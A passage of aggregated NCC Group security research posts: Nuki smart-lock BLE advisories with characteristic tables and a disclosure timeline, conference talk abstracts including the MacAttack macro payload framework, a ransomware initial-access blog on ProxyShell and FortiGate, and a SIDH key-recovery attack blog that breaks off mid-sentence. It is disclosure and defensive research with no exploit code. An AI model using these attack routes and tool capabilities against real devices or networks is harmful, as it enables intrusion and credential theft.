READ, WRITE, INDICATE
READ, WRITE, INDICATE
WRITE
009d -> ffff
00a1
00a7
00ad
000000960000100080000026bb765291
000000680000100080000026bb765291
0000008f0000100080000026bb765291
000000790000100080000026bb765291

READ, WRITE, INDICATE
READ, WRITE, INDICATE
READ, WRITE, INDICATE

Keyturner v3 characteristics with write properties:

Handles Service > Characteristics Properties
0008 -> 000b
000a
a92ee100550111e4916c0800200c9a66
a92ee101550111e4916c0800200c9a66

READ, WRITE, INDICATE
000c -> 0014
000e
0011
0014
a92ee200550111e4916c0800200c9a66
a92ee201550111e4916c0800200c9a66
a92ee202550111e4916c0800200c9a66
a92ee203550111e4916c0800200c9a66

READ, WRITE, INDICATE
READ, WRITE, INDICATE
WRITE
001a -> 002b
0022
0027
000000a20000100080000026bb765291
000000370000100080000026bb765291
000000a50000100080000026bb765291

READ, WRITE
READ, WRITE
002c -> 005f
0030
0035
003a
003f
0044
0049
004e
0053
005c
0000003e0000100080000026bb765291
000000140000100080000026bb765291
000000200000100080000026bb765291
000000210000100080000026bb765291
000000230000100080000026bb765291
000000300000100080000026bb765291
000000520000100080000026bb765291
000000530000100080000026bb765291
000000a60000100080000026bb765291
000002200000100080000026bb765291

READ, WRITE
READ, WRITE
READ, WRITE
READ, WRITE
READ, WRITE
READ, WRITE
READ, WRITE
READ, WRITE, INDICATE
READ, WRITE
0060 -> 0076
0064
0069
006e
0073
000000550000100080000026bb765291
0000004c0000100080000026bb765291
0000004e0000100080000026bb765291
0000004f0000100080000026bb765291
000000500000100080000026bb765291

READ, WRITE
READ, WRITE
READ, WRITE
READ, WRITE
0077 -> 0096
007b
0081
008a
0093
000000450000100080000026bb765291
000000a50000100080000026bb765291
0000001d0000100080000026bb765291
0000001e0000100080000026bb765291
000000230000100080000026bb765291

READ, WRITE
READ, WRITE, INDICATE
READ, WRITE, INDICATE
READ, WRITE
0097 -> 00a3
009b
00a0
000000440000100080000026bb765291
000000190000100080000026bb765291
000000370000100080000026bb765291

READ, WRITE
READ, WRITE
00a4 -> ffff
00a8
00ae
00b4
000000960000100080000026bb765291
000000680000100080000026bb765291
0000008f0000100080000026bb765291
000000790000100080000026bb765291

READ, WRITE, INDICATE
READ, WRITE, INDICATE
READ, WRITE, INDICATE

Recommendation

It is recommended to investigate the issue and try to identify the root cause.

Additionally, all BLE services and characteristics implemented by the Keyturner should be reviewed, disabling those which are not required for business purposes.

Insecure Invite Keys Implementation

Vendor: Nuki (https://nuki.io)
Systems and Versions affected:
- Nuki Smart Lock application (v2022.5.1 (661))

Authors:
- Daniel Romero: [email protected]
- Pablo Lorenzo: [email protected]
- Guillermo Del Valle Gil: [email protected]

CVE Identifier: N/A

Risk: 1.9 (CVSS:3.0/AV:L/AC:H/PR:H/UI:N/S:U/C:L/I:N/A:N)

Summary

Invite token, which was created to identify the user during the invitation process, was also used to encrypt and decrypt the invite keys on the Nuki servers.

Impact

If a malicious actor were to take control of the Nuki servers, this insecure implementation could facilitate the leak of this sensitive information and the impersonation of invited users.

Details

Based on conversations with Nuki, the invite functionality, which allows inviting users to interact with the Keyturner either temporarily or permanently, used the invite token to encrypt and decrypt the invite keys on the server side (Nuki servers), which reduces the effectiveness of the encryption implementation.

Encryption and decryption of sensitive information (such as invite keys) should be implemented on the client side (administrator and invited user), and the encryption keys should never be known to Nuki.

Recommendation

Based on conversations with the Nuki team, it is known that the invite functionality was designed to work when the temporary user is not close to the hardware device; this means that some external resources (e.g. the Nuki servers) are required.

Nevertheless, it is highly recommended to implement strong encryption so that sensitive data (such as invite keys) is never stored or sent outside the secure and trusted client environment.

A more secure implementation could use a pre-shared key exchanged between the Keyturner administrator and the invited user (as the invitation token is exchanged) in order to encrypt all invitation data (including the invitation key) before sending it to the Nuki servers. This would ensure that only the invited user could decrypt the sensitive information stored on the Nuki servers.

Opener Name Could Be Overwritten Without Authentication

Vendor: Nuki (https://nuki.io)
Systems and Versions affected:
- Nuki Opener (<1.8.1)

Authors:
- Daniel Romero: [email protected]
- Pablo Lorenzo: [email protected]
- Guillermo Del Valle Gil: [email protected]

CVE Identifier: N/A

Risk: 2.1 (CVSS:2.0/AV:L/AC:L/Au:N/C:N/I:P/A:N)

Summary

Opener Bluetooth Low Energy (BLE) characteristics were implemented insecurely.

Impact

The device allowed an unauthenticated attacker to change the BLE device name.

Details

The following were some of the services and characteristics available through the BLE protocol:

BLE write characteristic enabled

As seen in the image above, the “Device Name” characteristic had write access enabled. As a result, it was possible to send a write command to the device and change its name.

Recommendation

Require authentication for write operations on the device.

Vendor Communication

April 20 2022: Nuki was informed about the vulnerabilities found during the research.
May 6 2022: Nuki provided information to NCC Group about the fixes progress and potential release dates.
June 9 2022: Nuki released patches for all of the submitted vulnerabilities and informed their clients.
June 19 2022: Nuki provided updates about the patching progress of their clients.
July 25 2022: Technical advisories were released.

Thanks to

The Nuki team for their work during the whole process of responsible vulnerability disclosure. They have worked closely with NCC Group in order to provide their customers with security fixes for all the vulnerabilities found during the research. We would therefore like to praise their professionalism, responsiveness and commitment to the security of their product.

Matt Lewis (Commercial Research Director at NCC Group) for his help and support during the disclosure process.

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

Published date:  July 25 2022

Written by:  Daniel Romero, Pablo Lorenzo and Guillermo del Valle Gil


NCC Group Research at Black Hat USA 2022 and DEF CON 30

3 August 2022 at 20:15

This year, NCC Group researchers will be presenting at least five presentations at Black Hat USA and DEF CON 30.

A guide to these presentations (abstracts, dates, and links) is included below. We will also update this post with any additional presentations as they are accepted and announced.

Virtually or in-person, we hope you will join us!

Black Hat USA 2022

  • RCE-as-a-Service: Lessons Learned from 5 Years of Real-World CI/CD Pipeline Compromise (Iain Smart & Viktor Gazdag, NCC Group)
  • MacAttack – A client/server framework with macro payloads for domain recon and initial access (Chris Nevin, NCC Group)
  • Responding to Microsoft 365 security reviews faster with Monkey365 (Juan Garrido, NCC Group)

DEF CON 30

  • Pursuing Phone Privacy Protection (Matt Nash, NCC Group & Mauricio Tavares, Privacy Test Driver)
  • Hidden Payloads in Cyber Security (Chantel Sims, NCC Group)

Black Hat USA 2022

RCE-as-a-Service: Lessons Learned from 5 Years of Real-World CI/CD Pipeline Compromise

Iain Smart & Viktor Gazdag, NCC Group

Black Hat USA 2022 – Briefings

August 10-11 2022

In the past 5 years, we’ve demonstrated countless supply chain attacks in production CI/CD pipelines for virtually every company we’ve tested, with several dozen successful compromises of targets ranging from small businesses to Fortune 500 companies across almost every market and industry.

In this presentation, we’ll explain why CI/CD pipelines are the most dangerous potential attack surface of your software supply chain. To do this, we’ll discuss the sorts of technologies we frequently encounter, how they’re used, and why they are the most highly privileged and valuable targets in your company’s entire infrastructure. We’ll then discuss specific examples (with demos!) of novel abuses of intended functionality in automated pipelines which allow us to turn the build pipelines from a simple developer utility into Remote Code Execution-as-a-Service.

Is code-signing leading your team into a false sense of security while you programmatically build someone else’s malware? Is it true that “any sufficiently advanced attacker is indistinguishable from one of your developers”? Have we critically compromised nearly every CI/CD pipeline we’ve ever touched? The answer to all of these questions is yes.

Fortunately, this presentation will not only teach you exactly how we did it and the common weaknesses we see in these environments, but also share key defensive takeaways that you can immediately apply to your own development environments.


MacAttack – A client/server framework with macro payloads for domain recon and initial access

Chris Nevin, NCC Group

Black Hat USA 2022 – Arsenal

August 10-11 2022

While using macros for malicious purposes is nothing new, this tool provides a suite of payloads ideal for initial recon and footholds that will not burn other methods of attack. MacAttack is a framework that generates payloads for use in Excel and includes client/server communication to perform dynamic alterations at runtime and collate received data. The payloads included in MacAttack cover a number of areas that have not been published before, including a new stealth technique for hiding payloads, methods for retrieving a user’s hash, and performing common recon/early stages attacks such as As-Rep roasting, retrieving documents, browser credentials, password spraying the domain, enumerating users, and domain fronting. The client/server communication and GUI will allow for dynamic checks such as only allowing a password spray to run once or once within a certain time period even if multiple targets enable the payload at the same time, and will provide a visual representation of the enumerated information. Part of the benefit of this tool is that this information is retrievable from a “zero foothold” position – a phishing campaign may be detected or blocked – but this does not burn any existing beacons and the potential rewards can be as great as multiple sets of credentials for users and relevant authentication portals. Microsoft are rolling out changes to macros that have still not been fully deployed by the time of the deadline – and research into these changes and impacts will be included in the discussion. It looks like these changes will only affect O365 to begin with and will include a “recommended policy” to implement.


Responding to Microsoft 365 security reviews faster with Monkey365

Juan Garrido, NCC Group

Black Hat USA 2022 – Arsenal

August 10-11 2022

Monkey365 is a multi-threaded plugin-based PowerShell module to help assess the security posture of not only Microsoft 365, but also Azure subscriptions and Azure Active Directory. It contains multiple controls and currently supports CIS, HIPAA, GDPR, as well as custom security rules.


DEF CON 30

Pursuing Phone Privacy Protection

Matt Nash (NCC Group) & Mauricio Tavares (Privacy Test Driver)

DEF CON 30 – Crypto & Privacy Village

August 11-14 2022

New year, new challenges to privacy.

You are in a public event, or a coffee shop. Did a notification just tell you about a sale nearby? Why is this app showing ads for the car you rented and told your friend about? Is Santa Claus the only one who knows if you’ve been naughty or nice? “Maybe if I run a VPN I will be safe.” This is wishful thinking at best; it only helps to deal with some privacy attacks. You see, smart phones are little snitches. By design.

They listen to you. They know where you go, what you purchase, and who you interact with. And they never sleep or take vacations.

You can fight back. You can regain (at least some) control of your privacy! But it will not be done buying some magic software and pressing the EZ button. Some assembly is required.

If you are willing to roll up your sleeves and take your brave pill, join us in this workshop as we show how to build your Android phone with the balance between privacy, security, and convenience that fits your comfort level.

Attendees will come out of this workshop with a privacy mindset:

  • Appreciating the privacy and security implications of using a smart phone in general — specifically consumer Android devices.
  • Knowing how to achieve different levels of privacy in their phones and understanding the costs and benefits of each approach.
  • Understanding what “attribution of traffic” (tying an IP to a person through a VPN) is.
  • Finding out which apps are privacy-respecting, and how to contain untrusted apps that may be a “must have”.

Who should take this workshop:

  • Privacy-conscious smartphone users who would like to understand and control what their phones share about them.

Audience Skill Level:

  • Intermediate
  • Entry level, if you have studied the instructions and are prepared to hit the ground running. Or if your team is willing to help you out. We will NOT be able to wait for you to install 374 OS updates, download and install VirtualBox, and then build a Linux VM.

Attendees’ requirements

  • An understanding of basic Linux commands.
  • Be comfortable with the idea of installing an aftermarket firmware/OS (“ROM”) on a mobile device. Soft/hard “bricking” is a possibility, so having a spare phone may be a good investment.
  • Follow additional instructions provided on the GitHub repository (https://github.com/matthewnash/building-phone-privacy/wiki) ahead of the workshop.

What students should bring (or do beforehand)

  • An Android phone that has been configured per the GitHub instructions.
  • Alternatively, a laptop with Android Studio installed.
  • A learning attitude.


Hidden Payloads in Cyber Security

Chantel Sims, NCC Group

DEF CON 30 – Girls Hack Village

August 10-11 2022


Cybersecurity has a diversity problem. We all know this. Executives and managers believe that filling job roles and enacting diversity initiatives is where the work begins and ends. Even though we are aware of this diversity problem, we’ve only just begun the conversation of how bias directly impacts hiring practices and cyber operations themselves. Our lack of observation of our own biases has also made most of us blind to the bias that exists within our security tools and operations. To be fair, social engineering is the one, if not only, place where we bend and manipulate bias to our will. But I believe we should do the same within our operations as a whole. In 2018, Joy Buolamwini began to research and call out algorithmic bias and its impacts. Through Joy and Timnit Gebru’s research, the tech community has finally started to acknowledge the real-world implications of biased algorithms. As humans, we tend to “believe what we think”. It’s not common practice for most humans to question or challenge their thought bubbles. Most humans are aware that a thought doesn’t necessarily equate to being factual in reality, but the action of diving deeper seems to be staved off by our egos and credulous brains. I’d argue that our inaction to dive deeper into our own personal biases is a precursor to writing biased code or tools, and affects cyber operations in general, which in turn contributes to a continuing cycle of cyber operations embedded with bias.

Top of the Pops: Three common ransomware entry techniques

by Michael Mathews

Ransomware has been a concern for everyone over the past several years because of its impact on organisations, with the added pressure of extortion and regulatory involvement. However, the question always arises as to how we prevent it. Prevention is better than cure and hindsight is a virtue. This blog post aims to cover some high-level topics around ransomware groups, affiliates and their initial entry tactics.

Something to consider is the fact that ransomware has moved quickly into a Ransomware as a Service (RaaS) model, whereby affiliates are being provided all the weaponry and playbooks required to carry out their objectives. Given the simplicity of this approach, and the fact that the tactics are repeatable, there are a number of preventative measures that can be taken. Using this, we have devised this blog post to provide a short list of the top initial entry methods observed from the front line whilst responding to incidents over the past 6 months.

ProxyShell

ProxyShell is the collective name used to describe the vulnerabilities, released between April and July 2021, affecting Microsoft Exchange. These vulnerabilities have been covered in detail elsewhere [1]; for conciseness, they can be summarised as:

  • ACL Bypass (CVE-2021-34473)
  • Privilege Escalation (CVE-2021-34523)
  • Remote Code Execution (CVE-2021-31207)

Due to the Exchange infrastructure being externally facing, affiliates cast their nets far and wide scanning for victims that have failed to patch and thus begin their attacks by using ProxyShell as their initial foothold.

Mitigations

Patching! Patches were released in May 2021 by Microsoft to mitigate the vulnerabilities in the form of Windows update codes:

  • KB5001779
  • KB5003435

Microsoft Exchange Online (more commonly referred to as Office 365) was not affected. SaaS is a well-placed alternative and provides a barrier to your on-premises network (with appropriate security controls).

Externally Facing Infrastructure

Whilst we could classify Exchange under this term, it deserved its own spot given it is a firm favourite with ransomware groups (partly due to its success rate). In this category, we will cover another favourite: firewalls.

Firewalls and other perimeter security solutions have grown ever more complex and offer a wide variety of services beyond allowing and denying network traffic on the perimeter, most notably VPNs.

A prime example of this is a vulnerability that was exploited in FortiGate devices, CVE-2018-13379. The vulnerability itself was a directory traversal but, crucially, it provided access to sensitive files which contained plaintext passwords. In turn, you have your recipe for disaster and a ransomware actor’s initial entry point. The username and password could be used to authenticate with the VPN, giving threat actors a foothold on the internal network. However, this is just one example; on several occasions we have observed firewalls being targeted and successfully leveraged as an entry point into the network.

Mitigations

Once again, patching. Edge network devices are extremely exposed given their position within the network; the precise device you are using to keep threat actors at bay may in fact be the target in the first place. Ensure you have a robust patching policy and your devices are updated frequently.

Second, multi-factor authentication (MFA) is critical to mitigate standard username/password-based attacks. Although a vulnerability was exploited to gain access to credentials in this instance, phishing would have had the same impact if VPN credentials were targeted.

Exposed Remote Desktop (other VDI solutions)

An old favourite: the GUI interface of RDP. Whilst a great way to connect to a remote device, it does not really have a place on the internet. If your failed login count is hitting numbers you cannot easily explain, the underlying problem may be a host exposing RDP to the internet.

When paired with weak security controls, such as weak credentials (domain or local) and no lockout policy, you are effectively giving affiliates a free shot to take a gamble and gain access to your network. This is most prominent with development environments, set up with default settings, a weak local password and publicly available for ease of use. This is especially prevalent in cloud environments where build images inherit several security flaws through poor configuration but allow users to stand up infrastructure quickly.

Mitigations

Use an enterprise VPN solution with MFA configured to access internal resources from remote locations.

Treat development environments with care and ensure build images have appropriate security controls and protective monitoring in place.

Proactive Measures

Taking a proactive stance to ensure the integrity of your network is critical; it is never too late to begin hardening your defences, or at least to verify you are secure. However, if you need support or help to assess the scale of the issue, we can help:

  • Unsure if you are affected by any of these vulnerabilities or misconfigurations?
  • Have you identified a host that is vulnerable and requires further investigation?
  • Concerned about what is lurking in the wider network?

If you have been impacted by any of these issues, or currently have an incident and would like support, please contact our Cyber Incident Response Team at +44 161 209 5148 / [email protected]

[1] https://www.ncsc.gov.ie/pdfs/MS_Proxyshell_060921.pdf

Implementing the Castryck-Decru SIDH Key Recovery Attack in SageMath

8 August 2022 at 21:44

Introduction

Last weekend (July 30th) a truly incredible piece of mathematical/cryptanalysis research was put onto eprint. Wouter Castryck and Thomas Decru of KU Leuven published a paper “An efficient key recovery attack on SIDH (preliminary version)” describing a new attack on the Supersingular Isogeny Diffie-Hellman (SIDH) protocol together with a corresponding proof-of-concept implementation.

SIDH is at the core of the Post-Quantum key encapsulation mechanism SIKE, which was expected to continue to round four of the NIST Post-Quantum Project for consideration of standardisation. The paper says that their proof of concept code can break the proposed NIST level 1 parameters (supposedly approximating security on-par with AES-128) in an hour of single core computation, and the strongest parameter set in less than 24 hours.

However, the proof of concept code published has been written using the computer algebra software system Magma. Magma is a very efficient and powerful piece of software, but it is difficult for people to obtain access to. This meant that although the attack itself could run over a lunch break, most of the community was unable to verify the result at all.

Motivated by a beautiful attack and a love of open-source software, a plan was made to read the attack and implementation and then reimplement it in SageMath; a free, open-source mathematics software system. This was not only a great opportunity to learn exactly how the attack came together, but the effort should also then open up the research to the cryptographic community, who could verify the attack themselves. There’s nothing more convincing than seeing the secret key appear before your very eyes!

This blog post is about the attack, but it’s mainly a story about how the code was reimplemented and the help which was received from collaborators along the way. It’s been a wild week and there’s a lot to learn in more detail, but for those eager to break some isogeny based crypto protocols, the implementation is now available on a public GitHub repository. Thanks to some additional performance enhancements that we’ll talk about along the way, you can break the SIKE NIST level 1 parameter set with your laptop, a fresh download of SageMath and only 10 minutes of your time.

Approximate Running Time      | $IKEp217  | SIKEp434   | SIKEp503   | SIKEp610   | SIKEp751
Paper implementation (Magma)  | 6 minutes | 62 minutes | 2h19m      | 8h15m      | 20h37m
Our implementation (SageMath) | 2 minutes | 10 minutes | 15 minutes | 25 minutes | 1-2 hours
Comparison between running times of the original proof of concept released with Wouter Castryck and Thomas Decru’s paper, and the current version of our SageMath implementation. Our implementation is available in a public repository: https://github.com/jack4818/Castryck-Decru-SageMath

The search for quantum-safe cryptography

To understand the importance of the attack, it helps to put it in context. In 2016, NIST announced the Post-Quantum Cryptography Project. The aim was to call on cryptographers to submit algorithms split between two categories: key encapsulation mechanisms (KEMs) and digital signatures. The motivation is that the asymmetric cryptography currently in place — Diffie-Hellman key exchanges using elliptic curves for a KEM and ECDSA/EdDSA for digital signatures — can be efficiently broken by an attacker with access to a sophisticated quantum computer using Shor’s algorithm.

Although the construction of such a quantum computer has not been achieved, history tells us that the uptake of new algorithms is slow (we still see 3DES and MD5 in the wild, for example). So NIST believe the best plan is to act preemptively and to start working on getting new, quantum-safe algorithms out there as soon as possible.

Constructing new cryptographic algorithms is complicated. Furthermore, for asymmetric algorithms, we rely on the existence of some trapdoor function which is easy to perform one way and hard to undo the other. Typically, mathematics is used to create these functions (multiplication/factoring for RSA or exponentiation/discrete logarithms for elliptic curves). These mathematical trapdoors always come with some associated structure. The hope is that we understand the structure enough that we can confidently assume certain problems are hard to solve. In a quantum setting, it is the Abelian group structure of the ring of integers modulo N and the group of points on an elliptic curve which results in the break of RSA and ECC.
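As a toy illustration of that one-way asymmetry (nothing here is cryptographically sized; the prime, base and exponent below are made up for demonstration), the forward direction of modular exponentiation is one cheap operation, while inverting it by brute force takes time proportional to the size of the group:

```python
# Toy illustration (not real cryptography!) of a trapdoor's asymmetry:
# computing g^x mod p is cheap, recovering x from the result is not.

def discrete_log_bruteforce(g, h, p):
    """Find x with g^x = h (mod p) by trying every exponent in turn."""
    acc = 1
    for x in range(p - 1):
        if acc == h:
            return x
        acc = (acc * g) % p
    raise ValueError("no solution")

p, g = 65537, 3          # tiny prime field; 3 generates its multiplicative group
x = 31337                # the "secret" exponent
h = pow(g, x, p)         # forward direction: one fast modular exponentiation

# Backward direction: roughly p trial multiplications even at this toy size.
assert discrete_log_bruteforce(g, h, p) == x
```

At real parameter sizes (p of 2048+ bits, or a 256-bit curve group), the brute-force loop becomes astronomically long while the forward `pow` stays fast, which is exactly the gap a trapdoor function exploits.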

The balancing act of structure and cryptographically hard problems is at the heart of why projects such as the NIST PQCrypto Project take so long, with multiple rounds and iterative algorithm design. Cryptographic protocols can be designed and studied for years only to break after one very clever idea. This happened recently when Ward Beullens published Breaking Rainbow Takes a Weekend on a Laptop in June 2022, effectively knocking Rainbow out of the PQC project.

Last month, NIST announced the end of round three of the project and, with it, their first selection of algorithms to be standardised for cryptographic applications:

  • CRYSTALS-Kyber (KEM).
  • CRYSTALS-Dilithium, Falcon, and SPHINCS+ (Digital signatures).

To ensure diversity of trapdoor functions, NIST are starting round four. The hope is to find new KEM algorithms which have different hardness assumptions to Kyber, increasing the chances of having a long-lasting, quantum-safe KEM. A recent blog post by Thomas Pornin discusses in more detail the round three selections and a history of the NIST PQC project.

SIKE: Supersingular Isogeny Key Exchange

One of the candidates selected for round four is SIKE (Supersingular Isogeny Key Encapsulation), an isogeny based KEM which uses SIDH to perform the key exchange. This blog post won’t be a precise discussion of isogeny based cryptography, but for those who are interested here are some links to click through for a great first introduction:

To give some intuition though, we give an inaccurate but morally correct overview of what’s happening, by first making a stop at something more familiar.

In an elliptic curve key exchange, a shared secret is found in the following way. Alice and Bob both start with a fixed point and using a secret number they “move” from this point to their new points A and B, which are made public. They send these to each other and then Alice (Bob) moves from B (A) as they did before, using the same secret number on the new point. By doing this, they end up at the same “place”, a point S, and this is used to derive a key for the rest of their communication.
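The "end up at the same place" property is just the commutativity of scalar multiplication. Here is a minimal self-contained sketch over a tiny curve; the curve parameters, the generator and the secret scalars are purely illustrative (real deployments use standardised curves of cryptographic size):

```python
# Toy short-Weierstrass curve y^2 = x^3 + ax + b over F_p, small enough to
# play with. None of these numbers are from a real standard.
p, a, b = 9739, 497, 1768
O = None                                 # point at infinity

def add(P, Q):
    """Elliptic curve point addition with the usual special cases."""
    if P is None: return Q
    if Q is None: return P
    (x1, y1), (x2, y2) = P, Q
    if x1 == x2 and (y1 + y2) % p == 0:  # P + (-P) = O (also doubles y=0)
        return None
    if P == Q:                           # tangent line for doubling
        lam = (3 * x1 * x1 + a) * pow(2 * y1, -1, p) % p
    else:                                # chord through distinct points
        lam = (y2 - y1) * pow(x2 - x1, -1, p) % p
    x3 = (lam * lam - x1 - x2) % p
    return (x3, (lam * (x1 - x3) - y1) % p)

def mul(k, P):
    """Double-and-add scalar multiplication: the 'move' in the exchange."""
    R = None
    while k:
        if k & 1:
            R = add(R, P)
        P = add(P, P)
        k >>= 1
    return R

G = (1804, 5368)                         # a point on the toy curve
alice, bob = 6534, 4726                  # secret scalars
A_pub, B_pub = mul(alice, G), mul(bob, G)

# Both parties land on the same shared point S, because scalar
# multiplication commutes: alice * (bob * G) == bob * (alice * G).
assert mul(alice, B_pub) == mul(bob, A_pub)
```

The whole scheme rests on that final assertion holding while recovering `alice` from `A_pub` (the discrete log) stays infeasible at real sizes.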

In SIDH a very similar thing happens. Alice and Bob both start from the same place, but now instead of the start being a point on a curve, it is an elliptic curve itself. For reasons that aren’t necessary when so many other details are missing, not any old curve will do here. A special type of curve is used, which mathematicians know as a supersingular elliptic curve.

Alice and Bob then “move” from a public starting curve to some new curve, which will be part of the public data. This “movement” between curves is performed by creating a secret isogeny, which is a clever map which takes Alice from one curve to some other supersingular curve (while also preserving the group structure of the curve). The isogeny can be generated efficiently because of the clever parameters SIDH uses and for this post, it’s enough to know that Alice creates her secret isogeny by generating a secret integer. This is mixed into some fixed elliptic curve points which are defined by the SIKE parameters. This resulting secret point is what is used to generate the secret isogeny. The takeaway is: if an attacker can recover this secret integer, the whole protocol is broken.

To perform a key exchange, Alice and Bob both generate random numbers and use these to create secret isogenies. They use these to move to some new curves E_A and E_B, which they share with each other. The isogeny path problem is that, given two elliptic curves, it is generally very hard to determine the isogeny which links them. If you want a visual picture, the isogenies linking supersingular curves make a very messy graph and it’s easy to get lost. This is similar in feeling to the discrete log problem in an elliptic curve key exchange: given two points, it’s assumed to be hard to recover the integer which relates them.

In SIDH things aren’t quite as simple as the elliptic curve example. Given each other’s public curves, if Alice and Bob both naively use their isogenies again to try and move to the same place, they do not end up on a shared curve. All is not lost though: SIDH fixes this by including additional information in the exchange. Not only does Alice (Bob) send Bob (Alice) their public curve, they also use their isogeny to map a pair of public points from the starting curve to their new curve. These extra points are known as the torsion, or auxiliary, points. Sending a package of the mapped curve with the pair of mapped points is enough to ensure Alice and Bob end up on a shared secret curve (technically, up to isomorphism, but if this doesn’t make sense, forget you read it) and this can be used to derive keys.

SIKE builds on the SIDH protocol with fixed parameters and key encapsulation. But for our purposes for this attack, breaking SIDH also breaks all parameter sets of SIKE.

Since SIDH was proposed, the inclusion of additional information by sending the image of the torsion points has worried researchers. The concern was that the isogeny path finding problem could remain hard while the potentially easier problem, known as the Supersingular Decision Diffie-Hellman problem, could be broken through some information leaked out by how the secret isogeny acts on these auxiliary points.

This is the problem which Wouter Castryck and Thomas Decru have shown is easy! It turns out, the structure which is currently used in SIDH to make a sensible key-exchange mechanism leaked too much information about secret values. Through some genius mathematics and a deep understanding of the protocol, the Castryck-Decru attack recovers Bob’s secret isogeny in polynomial time.

This blog post is a celebration of this attack, and to talk about it, we talk about its implementation. The proof-of-concept code that Castryck and Decru shared with their paper was written to run in a special computer algebra software package called Magma. So, what’s Magma?

Computer algebra software

Cryptographic attacks which rely on advanced mathematics are often written using specialised mathematical software. For cases when the code needs to be hyper-optimised, the code is then usually translated to a more performant language after a proof of concept is developed. However, more often than not, these pieces of software are advanced enough to do what the researchers need. Let’s review two of the most commonly used software systems.

  • Magma is a computer algebra software package maintained by the University of Sydney. It is known for having expansive coverage, with efficient implementations of computational algorithms from algebra, number theory and algebraic geometry. It is also closed source, expensive and only available to people associated with institutions who maintain licence distribution.
  • SageMath is a free, open-source mathematics software system licensed under the GPL. Its mission is to “Create a viable free open source alternative to Magma, Maple, Mathematica and Matlab.” SageMath is built on top of Python, but many algorithms come from other open-source packages and are accessed through wrappers and interfaces, allowing high performance computation.

Because of the barriers to getting hold of Magma, many people active in the cryptographic research community don’t have access. However, if you are interested and want to run snippets of code, the Magma calculator allows cloud based computations (albeit with a two-minute run time limit).

In contrast, everyone with a computer has access to SageMath. Personally, I have used it extensively to learn about cryptography, build and deliver cryptography challenges for CryptoHack, and even occasionally to implement maths papers for fun! It’s an incredible piece of software.

Overview of the attack

Another disclaimer before starting this section, this blog post does not aim to give a comprehensive discussion of how Castryck and Decru have broken SIDH. The mathematics is very advanced, and requires a deep understanding of how SIDH works, as well as the more esoteric research of Abelian surfaces and Richelot isogenies.

The hope is only to give enough context that the rest of the post is motivated and enjoyable to read. So before starting, here are some great resources from the community discussing the result which the interested reader can browse through:

Attacking the structure of SIDH

Note: if you’re happy just accepting there’s clever mathematics which makes this attack work, you can skip the next two sections!

The attack uses several properties of the SIDH protocol and SIKE parameters. Whether all of these conditions are necessary for the attack to work is part of ongoing research, but to set the scene, let’s look at what is used.

The public key contains the image of the torsion points

  • This is totally vital for the attack. They are also totally vital for SIDH to be a sensible key exchange protocol, so in its current form, SIDH cannot avoid this part of the attack.
  • Knowing how the secret isogeny acts on the torsion points has been worrying for a long time. In Improved torsion-point attacks on SIDH variants, the authors of the paper heavily reduced the parameter space for SIDH, but the attack did not extend to the SIKE parameters.
  • In section 8.1 of the paper, arbitrary torsion points are discussed. It is thought that changing the form of the prime (and hence changing the torsion points) should inherently change nothing about the attack.

The secret isogenies have a fixed degree

  • Alice computes an isogeny of degree 2^a and Bob computes an isogeny of degree 3^b. This is the core of how the algorithm works, but it is also core to how the attack works.

The above two properties are the most important and are also special to SIDH. For this reason, people believe the attack cannot be generalised to other isogeny based schemes such as CSIDH or SQISign, which do not have isogenies of a fixed degree or additional torsion points.

The starting curve has a known endomorphism ring

  • Generating supersingular curves randomly is hard. Of the p^2 possible elliptic curves, only (about) \lfloor p/12 \rfloor are supersingular. For cryptographically large p, finding a supersingular curve by guessing is not reasonable.
  • Luckily, we have a way to write down a special supersingular curve for a given prime (which comes from the theory of complex multiplication). However, this method also gives us more structure: we learn the endomorphism ring of the curve.
  • One could use one of these curves, then generate an isogeny to walk to some random curve. However, knowing the starting curve and the isogeny used to get the new curve also leaks the endomorphism ring of the new curve.
  • In sections 8.2 and 8.3, Castryck and Decru outline that the attack should weaken the security of SIKE parameters, even when the endomorphism ring of the starting curve is unknown.

The Glue-and-Split oracle

From a high level, Castryck and Decru’s attack recovers the secret integer (in base 3) which is used to generate the secret isogeny; it does not directly compute the secret isogeny itself. The algorithm works by taking a step along the unknown path and asking the oracle if the step was correct. Depending on the return value, a new step can be guessed, or it can continue down the path to discover the next secret digit.

Walking down Bob’s secret path, there are only three possible directions to take after each step. This means that for each step taken, at most two calls to the oracle are needed. This is what makes the attack so efficient. Every step (except for the first few, depending on the parameter choices) can be validated one by one and the secret integer is recovered digit-by-digit.
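The recovery strategy itself is simple once the oracle exists. This schematic (plain Python; the real glue-and-split computation is mocked here by comparing a guessed prefix directly against the secret, purely to show the call-count logic) recovers the base-3 digits one at a time with at most two oracle calls per digit:

```python
import random

def recover_base3_digits(oracle, num_digits):
    """Recover a secret written in base 3, digit by digit, using an oracle
    that says whether a guessed prefix of digits is correct."""
    digits = []
    for _ in range(num_digits):
        # Three possible "directions"; at most two oracle calls decide.
        for guess in (0, 1):
            if oracle(digits + [guess]):
                digits.append(guess)
                break
        else:
            digits.append(2)   # the last direction needs no oracle call
    return digits

# Mock setup: in the real attack the oracle is the glue-and-split check
# built only from public data; here we cheat and peek at the secret.
secret = [random.randrange(3) for _ in range(20)]

def mock_oracle(prefix_guess):
    return secret[:len(prefix_guess)] == prefix_guess

assert recover_base3_digits(mock_oracle, len(secret)) == secret
```

The linear, digit-by-digit structure is why the attack runs in polynomial time: the total number of oracle calls grows only linearly with the number of digits, rather than exponentially with a search over the whole keyspace.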

The genius of the attack was finding a method to validate whether the step taken is on the right path. As the constructed oracle only requires public data, the SIDH protocol as currently implemented is totally broken. Due to the efficiency of the attack, the common defence of increasing the bit-size of the parameter space is not suitable.

The oracle begins with the collected public data. A cleverly constructed isogeny allows the creation of a new curve C from the starting curve E_{start}. Very loosely, the oracle takes these two curves and makes a new object from their product, which can be seen as a higher-dimensional abelian surface. The Glue-and-Split oracle then takes pairs of points from E_{start}: (P,Q) and C: (P_C, Q_C) and represents them as points on this higher-dimensional object (P_C, P) and (Q_C,Q) (these are points on the Jacobian of a hyperelliptic curve).

